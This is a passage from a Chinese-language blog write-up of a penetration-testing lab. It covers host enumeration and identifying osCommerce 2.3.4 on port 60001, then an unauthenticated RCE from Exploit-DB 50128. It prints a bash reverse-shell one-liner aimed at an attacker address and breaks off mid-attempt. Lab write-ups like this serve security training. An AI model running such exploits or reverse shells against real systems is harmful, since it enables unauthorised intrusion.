發表文章

目前顯示的是有「Froxlor」標籤的文章

Challenge 3 - SkyLark(1)

圖片
 Challenge 3 - SkyLark(1) LAB3 是 LAB 練習中最大的一個 LAB,公司網路拓樸如下 共區分三個網段,對外的是 192.168.xxx.0/24 共有八台機器,另外一樣提供一台 WINPREP 依據所提供的資訊一樣先整理攻擊列表如下 對外共八台,其中七台可以 Ping,依據 TTL 判斷 OS 紀錄如下 從 .220 一路開始枚舉,前三台目前沒有找到洞可以利用,直到第四台 .223 經過一番測試後 發現可以進去,所以攻擊順序第一台就選定 .223 執行 Rustscan,這一台僅有開一個 Port 60001 snmp check 沒有用 nmap,60001/tcp open  http    Apache httpd 2.4.41 ((Ubuntu)) 60001 / 60001 /robots.txt gobuster 排除 403、405、500,有兩個路徑 /catalog & /docs 查看 /docs 發現幾個檔案 查看 release_notes.pdf,看來系統像是 osCommerce Online Merchant v2.3.4 查看 /catelog 發現有些檔案打不開,查看檔案發現使用名稱 milan 名稱去存取 修改 hosts 將 milan 指向到靶機,可正常存取了 whatweb 看一下看來確認是 OSCommerce 網站也有明確寫出是 OSCOMMERCE CMS Exploit-DB 查看 osCommerce 2.3.4 有許多利用 直接看第一個 RCE 50128,說明是 php injection 到 DB 然後執行 system command 且最讚的一句 "# Notes: The RCE doesn't need to be authenticated" 直接執行看看 python code 告知要接 URL,輸入 URL 發現直接拿到 RCE Shell 不過執行 whoami、id 等都沒有輸出 直接跑 bash 試試看,bash -c "bash -i >& /dev/tcp/192.168.45.214/4444 0>&1" 沒有拿到 Reverse Shell 改跑 bash ...